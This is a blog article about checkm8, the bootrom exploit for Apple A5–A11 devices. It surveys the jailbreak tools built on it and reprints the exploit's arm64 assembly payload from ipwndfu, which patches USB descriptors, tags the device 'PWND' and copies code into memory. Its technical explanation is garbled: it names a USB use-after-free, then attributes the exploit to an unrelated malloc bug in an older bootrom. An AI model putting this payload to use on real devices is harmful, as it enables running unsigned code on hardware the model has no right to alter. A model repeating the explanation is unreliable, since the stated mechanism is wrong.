Checkm8 exploit for A5–A11 Apple devices on iOS 12 – 16

Kuba Pawlakqbap | Research
checkm8

On Sep 27, 2019 axi0mX released checkm8 (read “checkmate”),a permanent unpatchable bootrom exploit for hundreds of millions of iOS devices. In 2022 the exploit is still running on modern iOS 15 and iOS 16 jailbreaks for A9 – A11 SoC Apple devices.

What is Checkm8?

Checkm8 is a bootrom exploit with a CVE ID of CVE-2019-8900 used to run unsigned code on iOS, iPadOS, tvOS, watchOS, with processors between an A5 and an A11. It is used mostly to jailbreak Apple devices, and the exploit is the heart of the popular checkra1n jailbreak.

Jailbreaks based on checkm8 are semi-tethered jailbreaks, as the exploit works by taking advantage of a use-after-free in the USB DFU stack. It is used by ipwndfu, Fugu14, checkra1n, Palera1n, Blizzard Jailbreak, ayakurume, and a couple of other tools to exploit iOS 12 – iOS 16.

Using checkm8 exploit, it is possible to execute the code only when connecting your iPhone or iPad in DFU mode to the computer via a USB cable. checkra1n allows you to jailbreak iOS 12 up to iOS 14 with support for tweaks, and was never updated to add support for iOS 15.

Screenshot of VLS with loaded checkm8 source code for arm64 devices.

Checkm8 bootrom exploit is also able to execute code iOS 15. Nebula, the developer behind Palera1n Jailbreak released the first iOS 15 jailbreak based on checkm8 with tweak injection support on iOS 15.0 – 15.3.1. It also works up to iOS 15.7 on A9-A11 devices without tweaks.

How it works? In C programming language, the function malloc should return NULL if it is unable to allocate memory of the requested size. Caller should check if the returned pointer is NULL and handle the error. In S5L8920 bootrom this function is not implemented correctly. When it is unable to allocate memory, instead of NULL it returns a pointer to memory address 0x8.

Checkm8 takes the advantage over this vulnerability, making it possible to execute code on iOS, iPadOS, tvOS, and watchOS. This bug is on all Apple A5 – A11 devices and can't be fixed. Therefore, also iOS 16 is vulnerable and can be jailbroken on supported devices.

Note: Most generations of iPhones and iPads are vulnerable and be can exploited using checkm8: from iPhone 4S (A5 chip) to iPhone 8 and iPhone X (A11 chip).

New devices such as iPhone 14, iPhone 14 Pro, iPhone 13 Mini, iPhone 13, iPhone 13 Pro, iPhone 13 Pro Max, iPhone 12, iPhone 12 Pro, iPhone 12 Mini, iPhone 12 Pro Max iPhone 11 Pro, iPhone 11, iPhone 11 Pro Max, iPhone XR, iPhone XS Max, and iPhone XS are checkm8 proof.\

axi0mX, the developer behind checkm8 exploit, released the source code under GPL-3.0 license, making it possible to implement for third party tools. What's more, checkm8 exploit is a part of his ipwndfu open-source jailbreak tool for iOS devices, written in Python and Assembly.

On top of that, checkm8 exploit for A5–A11 is also implemented by the SSH Ramdisk Script to create and boot an SSH ramdisk on checkm8 devices. This tool can be used to install permanently IPA files on stock iOS. TrollStore IPA Installer was sideloaded this way.

Source Code

checkm8 exploit was written in Assembly. Below, you can view the checkm8 exploit source code for all arm64 devices that include all variations of iPhone 5S, iPhone 5S, iPhone SE, iPhone 7, iPhone 8, and iPhone X. checkm8 source code was published thought ipwndfu jailbreak.

.text

.pool
.set PAYLOAD_OFFSET,               0xBAD00006
.set PAYLOAD_SIZE,                 0xBAD00007
.set PAYLOAD_DEST,                 0xBAD00005
.set PAYLOAD_PTR,                  0xBAD00008
.set gUSBSerialNumber,             0xBAD00002
.set gUSBSRNMStringDescriptor,     0xBAD00004
.set gUSBDescriptors,              0xBAD00001
.set usb_create_string_descriptor, 0xBAD00003

.global _main
_main:
  MOV  X19, #0                      // HACK: do not free this usb request
  STP  X29, X30, [SP,#-0x10]!
  MOV  X29, SP

  LDR  X0, =gUSBDescriptors
  LDP  X0, X1, [X0]
  ADR  X2, USB_DESCRIPTOR
  LDP  X3, X4, [X2]
  STP  X3, X4, [X0]
  STP  X3, X4, [X1]
  LDP  X3, X4, [X2,#0x10]
  STP  X3, X4, [X0,#0x10]
  STP  X3, X4, [X1,#0x10]

  LDR  X0, =gUSBSerialNumber
find_zero_loop:
  ADD  X0, X0, #1
  LDRB W1, [X0]
  CBNZ W1, find_zero_loop

  ADR  X1, PWND_STRING
  LDP  X2, X3, [X1]
  STP  X2, X3, [X0]

  LDR  X0, =gUSBSerialNumber
  LDR  X1, =usb_create_string_descriptor
  BLR  X1

  LDR  X1, =gUSBSRNMStringDescriptor
  STRB W0, [X1]

  LDR  X0, =PAYLOAD_DEST
  ADR  X1, _main
  LDR  X2, =PAYLOAD_OFFSET
  ADD  X1, X1, X2
  MOV  X2, #0
  LDR  X3, =PAYLOAD_SIZE
  LDR  X4, =PAYLOAD_PTR
  ADD  X5, X0, #0x18
  STR  X5, [X4]

copy_loop:
  LDP  X3, X4,  [X1]
  STP  X3, X4,  [X0]
  LDP  X3, X4,  [X1,#0x10]
  STP  X3, X4,  [X0,#0x10]
  LDP  X3, X4,  [X1,#0x20]
  STP  X3, X4,  [X0,#0x20]
  LDP  X3, X4,  [X1,#0x30]
  STP  X3, X4,  [X0,#0x30]
  DC   CIVAC, X0
  DMB  SY
  ADD  X0, X0, #0x40
  ADD  X1, X1, #0x40
  ADD  X2, X2, #0x40
  CMP  X2, X3
  B.CC copy_loop

  SYS  #0, c7, c5, #0
  DSB  SY
  ISB

  LDP  X29, X30, [SP],#0x10
  RET

USB_DESCRIPTOR:
.word 0x190209, 0x80050101, 0x409fa, 0x1fe0000, 0x21070000, 0xa01, 0x8, 0x0

PWND_STRING:
.asciz " PWND:[checkm8]"

Checkm8 Jailbreaks

Since the release day, checkm8 exploit was used by many tools to jailbreak iOS. Some of them are published and ready to use, others are just in development. Only Palera1n for iOS 15 allows you to install tweaks, other tools are not released yet or are useful for developers only.

Post a comment